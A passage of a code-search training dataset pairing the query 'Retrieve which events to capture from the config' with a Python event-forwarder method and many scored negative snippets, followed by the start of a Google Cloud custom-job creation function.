"0.5698077", "0.5675902", "0.5672272", "0.5670915", "0.56694835", "0.5663252", "0.5663252", "0.56619465", "0.5659898", "0.56595063", "0.5646939", "0.5644488", "0.5639163", "0.5638686", "0.5633868", "0.56316924", "0.56316924", "0.56316924", "0.5622007", "0.56174004", "0.5614158" ]
0.0
-1
Retrieve which events to capture from the config
def set_capture_events_from_config(self):
        event_config = [
            {
                "config_key": "events_watchlist",
                "events": [
                    "watchlist.hit.process",
                    "watchlist.hit.binary",
                    "watchlist.storage.hit.process",
                    "watchlist.storage.hit.binary"
                ],
                "options": self.forwarder_options.get("wlhitnotifenabled", "0")
            },
            {
                "config_key": "events_feed",
                "events": [
                    "feed.ingress.hit.process",
                    "feed.ingress.hit.binary",
                    "feed.ingress.hit.host",
                    "feed.storage.hit.process",
                    "feed.storage.hit.binary",
                    "feed.query.hit.process",
                    "feed.query.hit.binary"
                ],
                "options": self.forwarder_options.get("feedhitnotif", "0")
            },
            {
                "config_key": "events_alert",
                "events": [
                    "alert.watchlist.hit.ingress.process",
                    "alert.watchlist.hit.ingress.binary",
                    "alert.watchlist.hit.ingress.host",
                    "alert.watchlist.hit.query.process",
                    "alert.watchlist.hit.query.binary"
                ],
                "options": self.forwarder_options.get("alertnotifenabled", "0")
            },
            {
                "config_key": "events_raw_sensor",
                "events": [
                    "ingress.event.process",
                    "ingress.event.procstart",
                    "ingress.event.netconn",
                    "ingress.event.procend",
                    "ingress.event.childproc",
                    "ingress.event.moduleload",
                    "ingress.event.module",
                    "ingress.event.filemod",
                    "ingress.event.regmod",
                    "ingress.event.tamper",
                    "ingress.event.crossprocopen",
                    "ingress.event.remotethread",
                    "ingress.event.processblock",
                    "ingress.event.emetmitigation",
                ],
                "options": self.forwarder_options.get("rawsensnotifenabled", "0")
            },
            {
                "config_key": "events_binary_observed",
                "events": ["binaryinfo.host.observed", "binaryinfo.observed", "binaryinfo.group.observed"],
                "options": self.forwarder_options.get("binobsnotifenabled", "0")
            },
            {
                "config_key": "events_binary_upload",
                "events": ["binarystore.file.added"],
                "options": self.forwarder_options.get("binuplnotifenabled", "0")
            }
        ]

        self.capture_events = []
        for event_type in event_config:
            events = self.forwarder_options.get(event_type["config_key"], "0").lower()
            if events == "all":
                self.capture_events.extend(event_type["events"])
            elif events != "0":
                events_from_config = events.split(",")
                events_to_capture = list(set(events_from_config) & set(event_type["events"]))
                self.capture_events.extend(events_to_capture)

        self.logger.info("Configured to capture events: %s" % self.capture_events)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_events(self):\n #Returne the capture events\n raise NotImplementedError", "def get_events(self):\n #Returne the capture events\n raise NotImplementedError", "def get_events(self):\n raise NotImplementedError", "def get_events(self):\n raise NotImplementedError", "def get_events(self):\n return self.events", "def events(self):\n return self.current_events", "def available_events(self):\n return self.target.read_value(self.available_events_file).splitlines()", "def events(self):\n return self._events", "def events(self) -> Dict[EventCall, Set[Node]]:\n return self._events", "def getSimulationEventHandlers(self): \r\n return self.__eventHandlers.values()", "def events(self) -> object:\n return self._events", "def get_event_list(self):\n pass", "def events(self):\r\n return ev.Events(self)", "def events(self):\r\n return ev.Events(self)", "def GetEventSources(self):\n return self._GetAttributeContainers('event_source')", "def get_event(self):\n return self.keys.events.get()", "def get_sample_events(self): \n return self.sample_events[:]", "def events(self):\n return self.properties.get('events', EventCollection(self.context, ResourcePath(\"events\", self.resource_path)))", "def events(self):\r\n return e.Events(self)", "def get_events(self):\n ret = []\n while True:\n event = self.event.get_event(wait=1, full=True)\n if event is None:\n return ret\n ret.append(event)", "def get_events(self):\n self._events = []\n self.ircobj.process_once(timeout=0.1)\n return self._events", "def events(self) -> Sequence[Tuple[str, Sequence[Union[np.ndarray, bytes]]]]:\n return self._env.events()", "def get_config_parameter(config):\n\n selected_event = config['selected_event']\n datasource_raw_data = config['datasource_raw_data']['database']\n measurement_raw = config['datasource_raw_data']['measurement']\n measurement_enriched = config['datasource_enriched_data']['measurement']\n datasource_enriched_data = config['datasource_enriched_data']['database']\n datasource_marked_data = config['datasource_marked_data']['database']\n datasource_predicted_data = config['datasource_predicted_data']['database']\n start_time = config['timeframe'][0]\n end_time = config['timeframe'][1]\n register_dict = config['register_dict']\n required_registers = config[f\"{selected_event}_register\"]\n events = config[selected_event]\n measurement_predicted = config['datasource_predicted_data']['measurement']\n return selected_event, datasource_raw_data, measurement_raw, start_time, end_time, register_dict, \\\n required_registers, datasource_enriched_data, datasource_marked_data, \\\n measurement_enriched, events, datasource_predicted_data, measurement_predicted", "def event_handlers(self):\n if self.is_flow:\n return self._event_handlers\n\n try:\n return self._event_handlers\n except AttributeError:\n return self.flow._event_handlers", "def get_events(self):\n events = []\n for device in self:\n events.extend(self[device].get_events())\n return events", "def event_list(self):\n return self._event_list", "def events(self):", "def get_handlers_for_event(self, event):\n pass # pragma: no cover", "def get_all(self):\r\n return list(pecan.request.storage_conn.get_event_types())", "def eventList(self):\n return self._eventList", "def event_log(self):\n pass", "def get_event_handlers(self, obj):\n\n ret = []\n if not obj.events: return ret\n events = [(name,handler) for name, handler in obj.events if handler.strip()]\n if not events: return ret\n\n try:\n default_event = self.config['events']['default']['type']\n except 
KeyError:\n default_event = 'wxCommandEvent'\n\n for event, handler in sorted( events ):\n if not handler: continue\n\n if self.codegen.preview and handler.startswith(\"lambda \"):\n if self.codegen.language!='python': continue\n handler = \"lambda event: print('event handler: lambda function')\"\n\n major = 'wx%d' % self.codegen.for_version[0]\n detailed = 'wx%d%d' % self.codegen.for_version\n try:\n supported_by = self.config['events'][event]['supported_by']\n if not (major in supported_by or detailed in supported_by):\n continue\n except (AttributeError, KeyError):\n pass\n\n # check for specific event type\n type_generic = 'type_%s' % major\n try:\n evt_type = self.config['events'][event][type_generic]\n ret.append((obj, event, handler, evt_type))\n continue\n except KeyError:\n pass\n\n # check for generic event type\n try:\n evt_type = self.config['events'][event]['type']\n except KeyError:\n evt_type = default_event\n ret.append((obj, event, handler, evt_type))\n return ret", "def required_event_keys(cls):\n return {'app_type', 'destination_function_name', 'schedule_expression'}", "def list_events(option, opt_str, value, parser):\n\n print 'On this system SystemConfiguration supports these events:'\n for event in sorted(SCDynamicStoreCopyKeyList(get_sc_store(), '.*')):\n print \"\\t\", event\n\n print\n print \"Standard NSWorkspace Notification messages:\\n\\t\",\n print \"\\n\\t\".join('''\n NSWorkspaceDidLaunchApplicationNotification\n NSWorkspaceDidMountNotification\n NSWorkspaceDidPerformFileOperationNotification\n NSWorkspaceDidTerminateApplicationNotification\n NSWorkspaceDidUnmountNotification\n NSWorkspaceDidWakeNotification\n NSWorkspaceSessionDidBecomeActiveNotification\n NSWorkspaceSessionDidResignActiveNotification\n NSWorkspaceWillLaunchApplicationNotification\n NSWorkspaceWillPowerOffNotification\n NSWorkspaceWillSleepNotification\n NSWorkspaceWillUnmountNotification\n '''.split())\n\n sys.exit(0)", "def file_events(self):\n return self._file_events", "def get_events(self):\n events_path = self.config.get('filename_rasterization_events')\n if events_path is not None:\n summary = pd.read_csv(events_path)\n return summary\n else:\n return None", "def events(self) -> typing.List[aws_cdk.aws_s3.EventType]:\n return self._values.get('events')", "def _setup_events(conf):\n events = {}\n for name in conf.keys():\n events[name] = Event(name=name)\n for listener in conf[name]:\n action = 'run'\n if ':' in listener:\n listener, action = listener.rsplit(':')\n events[name].add_listener(listener, action)\n\n # Add events to module scope.\n globals().update(events)", "def getevent(self, filename):\n return self.events[filename.lower()]", "def config(self): # type: () -> t.Dict[str, t.Any]\n return self.inspection['Config']", "def audit_log_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AuditLogConfigArgs']]]]:\n return pulumi.get(self, \"audit_log_configs\")", "def state_capture_do(cfg, app, win, events):", "def get_timed_events(self):\n return self.dispatcher.timed_events", "def event(self):\n return self.events[0]", "async def load_events(\n self,\n event_config: dict,\n guild: Guild\n ) -> Dict[int, BaseEvent]:\n events = {}\n for message_id_str, event_dict in event_config.items():\n events[int(message_id_str)] = await self.load_event(\n event_dict,\n guild\n )\n\n return events", "def event_stats(self):\n pass", "def event_pattern(self):\n pass # pragma: no cover", "def evrConfig(self):\n return getattr(getattr(self._data.evrConfig, self._name), 'evr')", "def 
get_event(self):\r\n return self.events[0]", "def build_events(self) -> list:\n raise NotImplementedError()", "def get_events_list(self, opts, args):\n\n\t\timport events\n\n\t\tself.setup_listener_gettext()\n\n\t\t# we need to merge, because some events have only\n\t\t# handlers, and others have only callbacks.\n\t\tevents_names = set(events.events_handlers.keys()\n\t\t\t\t\t\t\t+ events.events_callbacks.keys())\n\t\tmax_name_len = max(len(x) for x in events_names)\n\n\t\tif opts.verbose >= verbose.INFO:\n\t\t\tremote_output(_(u'{0} distinct event(s), {1} handler(s) '\n\t\t\t\t\tu'and {2} callback(s)').format(len(events_names),\n\t\t\t\t\tsum(len(x) for x in events.events_handlers.itervalues()),\n\t\t\t\t\tsum(len(x) for x in events.events_callbacks.itervalues())\n\t\t\t\t\t) + u'\\n')\n\t\t\tfor event_name in events_names:\n\t\t\t\thandlers = events.events_handlers.get(event_name, ())\n\t\t\t\tcallbacks = events.events_callbacks.get(event_name, ())\n\n\t\t\t\tremote_output(_(u'Event: {0}\\n\\tHandlers:{1}{2}\\n'\n\t\t\t\t\t\tu'\\tCallbacks:{3}{4}\\n').format(\n\t\t\t\t\tstylize(ST_NAME, event_name),\n\t\t\t\t\tu'\\n\\t\\t' if len(handlers) else u'',\n\t\t\t\t\tu'\\n\\t\\t'.join(_(u'{0} in module {1}').format(\n\t\t\t\t\t\tstylize(ST_NAME, h.__name__),\n\t\t\t\t\t\tstylize(ST_COMMENT, h.__module__)) for h\n\t\t\t\t\t\t\tin handlers),\n\t\t\t\t\tu'\\n\\t\\t' if len(callbacks) else u'',\n\t\t\t\t\tu'\\n\\t\\t'.join(_(u'{0} in module {1}').format(\n\t\t\t\t\t\tstylize(ST_NAME, c.__name__),\n\t\t\t\t\t\tstylize(ST_COMMENT, c.__module__)) for c\n\t\t\t\t\t\t\tin callbacks),\n\t\t\t\t))\n\t\telse:\n\t\t\tfor event_name in events_names:\n\t\t\t\tremote_output(_(u'{0}: {1} handler(s), {2} callback(s).\\n').format(\n\t\t\t\t\t\t\tstylize(ST_NAME, event_name.rjust(max_name_len)),\n\t\t\t\t\t\t\tlen(events.events_handlers.get(event_name, ())),\n\t\t\t\t\t\t\tlen(events.events_callbacks.get(event_name, ())),\n\t\t\t\t\t\t))", "def events(self):\r\n return resources.Events(self)", "async def events(self) -> Iterable[Event]:", "def parse_events(events_dict):\n return events_dict['events']", "def get_config_files(self):\n flag, i = self.inotify\n\n if flag:\n kwargs = {}\n\n if PY3:\n kwargs['timeout_s'] = 0\n\n filenames = set()\n\n for event in i.event_gen(**kwargs):\n if event is None:\n break\n\n filenames.add(event[3])\n\n return list(filenames)\n\n else:\n return os.listdir(self.watch)", "def getevent(self, name):\n return self.events[name.lower()]", "def events(config, time, utc, a, tk):\n if not config.store:\n try:\n cert = tk.read()\n token = _collect_token(config, cert)\n except:\n click.secho(\"No token\", fg='red')\n else:\n _check_options(config, \"events\", time, utc, a, token)\n else:\n try:\n token = config._set_token()\n except:\n click.secho(\"No token\", fg='red')\n else:\n _check_options(config, \"events\", time, utc, a, token)", "def get_events(self):\n disallowed = [ident(self.add_event.__func__), ident(ident)]\n self.frames = None\n\n return [item for item in self.events if item[2] not in disallowed]", "def handleEvents(self, events):\n pass", "def eventList(filterStr=\"\"):\n\tfilterStr = filterStr.upper()\n\tevents = [i for i in dir(cv2) if 'EVENT' in i and filterStr in i]\n\treturn events", "def _default_events_fetcher(self):\n raise NotImplementedError", "def _default_events_fetcher(self):\n raise NotImplementedError", "def event_filters(self) -> pulumi.Output[Sequence['outputs.EventFilterResponse']]:\n return pulumi.get(self, \"event_filters\")", "def GetEventData(self):\n 
return self._GetAttributeContainers('event_data')", "def on_starting(self):\n\n self.set_capture_events_from_config()", "def get_events(self):\n\n events = []\n\n for watched_file in self._watched_files:\n for line in watched_file:\n self._do_rule_processing(line, events)\n\n return events", "def bootstrap_core_events() -> Sequence[EventDefinition[Any]]: # type: ignore\n return (\n (\n EVENT_ID_EVENT_LISTENER_ADDED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n EventListenerAddedEvent,\n EventListenerAddedEvent(EVENT_ID_EVENT_LISTENER_ADDED, NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_REGISTER_EVENT,\n QUEUE_EVENT_HIGH, PRODUCE_EVENT_PROTECTION,\n RegisterEventEvent,\n RegisterEventEvent(\n EVENT_ID_DISPOSE_COMPLETE, QUEUE_EVENT_IO, GLOBAL_EVENT_PROTECTION,\n DisposeCompleteEvent, DisposeCompleteEvent(NOT_PARTICIPANT)\n ),\n ),\n (\n EVENT_ID_DISPOSE_COMPLETE,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n DisposeCompleteEvent,\n DisposeCompleteEvent(NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_REQUEST_DISPOSE,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n RequestDisposeEvent,\n RequestDisposeEvent(NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_COMPONENT_CREATED,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n ComponentCreatedEvent,\n ComponentCreatedEvent(NOT_PARTICIPANT, 1),\n ),\n (\n EVENT_ID_COMPONENT_CREATION_FAILED,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n ComponentCreationFailedEvent,\n ComponentCreationFailedEvent('x', 1, UserMessage(i18n(''))),\n ),\n (\n EVENT_ID_REQUEST_NEW_COMPONENT,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n RequestNewComponentEvent,\n RequestNewComponentEvent(object(), NOT_PARTICIPANT, 1),\n ),\n (\n EVENT_ID_SYSTEM_STARTED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n SystemStartedEvent,\n SystemStartedEvent(),\n ),\n (\n EVENT_ID_SYSTEM_HALTED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n SystemHaltedEvent,\n SystemHaltedEvent()\n ),\n (\n EVENT_ID_ERROR,\n QUEUE_EVENT_HIGH, GLOBAL_EVENT_PROTECTION,\n ErrorEvent,\n ErrorEvent(ErrorReport('', ERROR_CATEGORY_USER, UserMessage(i18n(''))))\n ),\n )", "def events(self):\n return get_tsv(self.path, self.values, 'events.tsv')", "def sensors(self):\n return self.camdata.current_event_states", "def get_devices(self):\n devices = self.get(\"event/device\")", "def respond_to_events(self):\n event_response = MessageEventHandler(self.state, self.meta_data, self.message_data).handle_events(events=self.events)\n\n if event_response == []:\n return {}\n return event_response[0]", "def get_api_event(self):\n pass", "def quic_configs(self) -> Sequence['outputs.GetListenersListenerQuicConfigResult']:\n return pulumi.get(self, \"quic_configs\")", "def events(self):\n return self.search(comp_class=Event)", "def _est_config(self):\n return self._est_method.config", "def get_game_events(self):\n\t\tcontents = self.archive.read_file('replay.game.events')\n\t\treturn self.protocol.decode_replay_game_events(contents)", "def event_map(self) -> dict:\n return self._event_map", "def event_filters(self) -> pulumi.Input[Sequence[pulumi.Input['EventFilterArgs']]]:\n return pulumi.get(self, \"event_filters\")", "def list_events(self, name):\n return self._get_events(name)", "def get_events():\n url = app.config['EVENTS_ENDPOINT']\n response = requests.get(url, params={})\n if response.status_code == 200:\n return parse_events(response.json())\n raise RuntimeError('Error in retrieving events.')", "def list_events():\n return [\n snow,\n mosquito,\n sun_heat,\n orage,\n overflowing,\n gathering,\n trampling,\n pollution,\n 
southern_wind,\n northern_wind,\n fog,\n sun\n ]", "def _get_conf(self):\n self.press_conf = self.sysconf['PressureRegulators']\n return self.press_conf['PressureRegulator%d' % self.id_]", "def events(self) -> Optional[annotations.Events]:\n return load_events(self.csv_path)", "def all_events(cls) -> \"IFilterPattern\":\n return jsii.sinvoke(cls, \"allEvents\", [])", "def get_allpack_events(self):\n return self.comp('packmanager').get_allpack_events()", "def audit_log_configs(self) -> Sequence['outputs.AuditLogConfigResponse']:\n return pulumi.get(self, \"audit_log_configs\")", "def event_stats(self):\n return self.base_stats", "def get_events():\n # reads the session\n session = request.args.get('session', type=str)\n process = request.args.get('process', default='receipt', type=str)\n\n dictio = {}\n\n if check_session_validity(session):\n user = get_user_from_session(session)\n if lh.check_user_log_visibility(user, process):\n caseid = request.args.get('caseid', type=str)\n events = lh.get_handler_for_process_and_session(process, session).get_events(caseid)\n i = 0\n while i < len(events):\n keys = list(events[i].keys())\n for key in keys:\n if str(events[i][key]).lower() == \"nan\" or str(events[i][key]).lower() == \"nat\":\n del events[i][key]\n i = i + 1\n dictio = {\"events\": events}\n ret = jsonify(dictio)\n return ret", "def event_queue(self):\n return self.assoc.dul.event_queue", "def event(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"event\")", "def get_attributes(self):\n\t\tcontents = self.archive.read_file('replay.attributes.events')\n\t\treturn self.protocol.decode_replay_attributes_events(contents)", "def config(self):\n annotations = IAnnotations(self.context)\n return annotations.get(CONFIGURATION_KEY, {})", "def getSimulationEventGenerators(self):\r\n raise NotImplementedError()", "def prepare_config(cls, config, is_mode_config):\n if not is_mode_config:\n if 'enable_events' not in config:\n config['enable_events'] = 'ball_started'\n if 'disable_events' not in config:\n config['disable_events'] = 'ball_will_end'\n return super().prepare_config(config, is_mode_config)", "def prepare_config(cls, config, is_mode_config):\n if not is_mode_config:\n if 'enable_events' not in config:\n config['enable_events'] = 'ball_started'\n if 'disable_events' not in config:\n config['disable_events'] = 'ball_will_end'\n return super().prepare_config(config, is_mode_config)", "def get_cycles_with_events(self):\n cycles = []\n for el in self.events:\n for key in el:\n if type(el[key]) == dict and \"cycle\" in el[key]:\n cycles.append(el[key][\"cycle\"])\n return cycles if len(cycles) > 0 else None", "def gather_configuration(self, config):\n config['log']['logging_level'] = self.logDisplay.get_logging_level()\n\n # MIDI\n config['midi']['winch_midi_input'] = self.winchMidiInputCombo.current_item()\n config['midi']['midi_output'] = self.midiOutputCombo.current_item()\n\n # OSC\n addr, port = self.oscListenerConfig.get_OSC_port()\n config['osc']['listener_addr'] = addr\n config['osc']['listener_port'] = str(port)\n addr, port = self.oscSenderConfig.get_OSC_port()\n config['osc']['sender_addr'] = addr\n config['osc']['sender_port'] = str(port)\n\n # DMX\n config['dmx']['dmx_output_serial_port'] = self.dmxSelect.current_item()\n\n # winches\n for i, winchSelect in enumerate(self.winchSelects):\n key = \"winch_%d_output_serial_port\" % (i+1)\n config['winches'][key] = winchSelect.current_item()\n\n return", "def available_functions(self):\n return self.config.keys()", "def 
notification_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FhirNotificationConfigArgs']]]]:\n return pulumi.get(self, \"notification_configs\")", "def get_event_parts(self, event):\r\n if self.board is None:\r\n return None\r\n \r\n return self.board.area.get_event_parts(event)" ]
[ "0.7154731", "0.7154731", "0.6736886", "0.6736886", "0.6634429", "0.6563874", "0.6368687", "0.6339225", "0.6153467", "0.6147387", "0.6090058", "0.60785455", "0.6055919", "0.6055919", "0.6025618", "0.60202944", "0.60145056", "0.60046005", "0.59880394", "0.5945153", "0.5929929", "0.5897296", "0.58912104", "0.5885696", "0.5836988", "0.58198863", "0.5816348", "0.5788318", "0.5783439", "0.5779", "0.5772006", "0.5766295", "0.57557803", "0.5746701", "0.57403934", "0.57002306", "0.5668009", "0.566208", "0.56292546", "0.560008", "0.55915874", "0.5582906", "0.55812645", "0.5574418", "0.55533975", "0.5514624", "0.5497138", "0.5487934", "0.54834926", "0.5475069", "0.54727745", "0.54724693", "0.54689485", "0.54630786", "0.5459319", "0.5457004", "0.5455284", "0.545281", "0.5449081", "0.5439896", "0.5439735", "0.5439735", "0.5427479", "0.542375", "0.54152286", "0.5409262", "0.54004014", "0.5384491", "0.5373765", "0.53709406", "0.5363837", "0.53580254", "0.53523123", "0.53395474", "0.5317266", "0.53074247", "0.5306851", "0.5284953", "0.5283504", "0.52795255", "0.5261794", "0.5242784", "0.5241931", "0.5240707", "0.5222774", "0.5218455", "0.51810765", "0.51786226", "0.51780146", "0.5174763", "0.51627505", "0.51585007", "0.5156394", "0.5147988", "0.5147988", "0.5142038", "0.51240826", "0.5122801", "0.5115813", "0.5115588" ]
0.7547521
0
the id of the Condition
def __init__(self):
    self.id = None
    self.typeInfo['id'] = 'string'
    """the owner of the Condition."""
    self.account = None
    self.typeInfo['account'] = 'string'
    """Details of the Counter."""
    self.counter = None
    self.typeInfo['counter'] = 'list'
    """the domain name of the owner."""
    self.domain = None
    self.typeInfo['domain'] = 'string'
    """the domain id of the Condition owner"""
    self.domainid = None
    self.typeInfo['domainid'] = 'string'
    """the project name of the Condition"""
    self.project = None
    self.typeInfo['project'] = 'string'
    """the project id of the Condition."""
    self.projectid = None
    self.typeInfo['projectid'] = 'string'
    """Relational Operator to be used with threshold."""
    self.relationaloperator = None
    self.typeInfo['relationaloperator'] = 'string'
    """Threshold Value for the counter."""
    self.threshold = None
    self.typeInfo['threshold'] = 'long'
    """zone id of counter"""
    self.zoneid = None
    self.typeInfo['zoneid'] = 'string'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getId(self):", "def condition_id(self, condition_id):\n\n self._condition_id = condition_id", "def id(self):\n return self.status.id", "def getID():", "def _id(self):\n pass", "def get_id(self):\n return \"required_modules_exists_but_condition_is_false_plugin\"", "def check_id(self, id):", "def id(self):\n\t\treturn self.__id", "def id(self):\n return self[\"id\"]", "def identifier(self):\r\n return self.id", "def fullId(self):\n return self.sampleid+' '+self.condition+' '+self.activeChildWellIdStr()", "def getIdent (self) :\n return self.id", "def condition(self) -> global___Expression:", "def condition(self) -> global___Expression:", "def id(self):\n return self.getattr('id')", "def condition_number(self):\n return self._condition_number", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def id(self):\n raise NotImplementedError()", "def getID(self) -> int:\n ...", "def id(self):\n return self.get('id')", "def id(self) -> str:\n pass", "def id(self):\n return self.__id", "def id(self): # type: () -> str\n return self.inspection['Id']", "def get_id(self, expr):\n return self.table.inv[expr]", "def match_id(self):\n return self._id", "def id(self):\n return self.query.query_id", "def condition(self) -> str | None:\n return self._condition", "def id(self):\n return self.data[\"id\"]", "def id(self):\n return self.values.get('id')", "def getId(self): #$NON-NLS-1$\r", "def resourceid(self):", "def _get_id(self):\n return self.id", "def id(self):\n return self.get_data(\"id\")", "def condition_code(self) -> int:\n condition_code = {\"new\": 1000, \"used\": 3000}\n\n try:\n return condition_code[self.__condition_name] \n except KeyError:\n raise KeyError(\"condition_name must be a string 'new' or 'used'\")", "def id(self) -> Optional[str]:\n return self.elem.get('id')", "def get_id(self): # pragma: no cover\n pass", "def getCondition(self):\r\n return self.controller.getCondition()", "def logical_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"logical_id\")", "def logical_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"logical_id\")", "def logical_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"logical_id\")", "def logical_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"logical_id\")", "def get_condition_identifiers(self):\n\t\treturn set(self.conditions)", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def get_actual_id(translated):", "def id(self) -> str:\n return self.value", "def id(self):\n return self.data.id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def 
_get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):" ]
[ "0.615068", "0.60920733", "0.60874665", "0.60557884", "0.5979219", "0.5969927", "0.5945815", "0.593884", "0.59332013", "0.589888", "0.5893271", "0.58621705", "0.58531296", "0.58531296", "0.58335763", "0.57970726", "0.57366246", "0.57366246", "0.57366246", "0.57366246", "0.5713217", "0.56852996", "0.5669668", "0.56557226", "0.56450987", "0.5632942", "0.5631342", "0.5628311", "0.5618573", "0.55993605", "0.5592219", "0.55867267", "0.558389", "0.5579396", "0.5577821", "0.55752593", "0.5569272", "0.5563658", "0.555306", "0.55511737", "0.55409896", "0.55409896", "0.55409896", "0.55409896", "0.55380523", "0.55252945", "0.55252945", "0.55252945", "0.55252945", "0.55252945", "0.55252945", "0.5511745", "0.54968077", "0.54854363", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225" ]
0.0
-1
Constructs a request and sends it to the endpoint to create a custom job instance.
def Create(self,
           parent,
           specs=None,
           config_path=None,
           display_name=None,
           python_package_uri=None,
           args=None,
           command=None,
           kms_key_name=None,
           network=None,
           service_account=None):
    if not python_package_uri:
        python_package_uri = []

    job_spec = self.messages.GoogleCloudAiplatformV1beta1CustomJobSpec()
    job_spec.network = network
    job_spec.serviceAccount = service_account

    if config_path:
        data = yaml.load_path(config_path)
        if data:
            job_spec = messages_util.DictToMessageWithErrorCheck(
                data, self.messages.GoogleCloudAiplatformV1beta1CustomJobSpec)

    worker_pool_specs = []
    if specs is not None:
        for spec in specs:
            machine_type = spec.get('machine-type')
            if not spec.get('replica-count'):
                replica_count = 1
            else:
                replica_count = int(spec.get('replica-count'))
            container_image_uri = spec.get('container-image-uri')
            python_image_uri = spec.get('python-image-uri')
            python_module = spec.get('python-module')

            machine_spec = (
                self.messages.GoogleCloudAiplatformV1beta1MachineSpec(
                    machineType=machine_type))
            worker_pool_spec = (
                self.messages.GoogleCloudAiplatformV1beta1WorkerPoolSpec(
                    replicaCount=replica_count, machineSpec=machine_spec))

            if container_image_uri:
                worker_pool_spec.containerSpec = (
                    self.messages.GoogleCloudAiplatformV1beta1ContainerSpec(
                        imageUri=container_image_uri))
                if args is not None:
                    worker_pool_spec.containerSpec.args = args
                if command is not None:
                    worker_pool_spec.containerSpec.command = command

            if python_package_uri or python_image_uri or python_module:
                worker_pool_spec.pythonPackageSpec = (
                    self.messages.GoogleCloudAiplatformV1beta1PythonPackageSpec(
                        executorImageUri=python_image_uri,
                        packageUris=python_package_uri,
                        pythonModule=python_module))
                if args is not None:
                    worker_pool_spec.pythonPackageSpec.args = args

            worker_pool_specs.append(worker_pool_spec)

    if worker_pool_specs:
        job_spec.workerPoolSpecs = worker_pool_specs
    validation.ValidateWorkerPoolSpec(job_spec.workerPoolSpecs)

    custom_job = (
        self.messages.GoogleCloudAiplatformV1beta1CustomJob(
            displayName=display_name, jobSpec=job_spec))
    if kms_key_name is not None:
        custom_job.encryptionSpec = self.messages.GoogleCloudAiplatformV1beta1EncryptionSpec(
            kmsKeyName=kms_key_name)

    return self._service.Create(
        self.messages.AiplatformProjectsLocationsCustomJobsCreateRequest(
            parent=parent,
            googleCloudAiplatformV1beta1CustomJob=custom_job))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
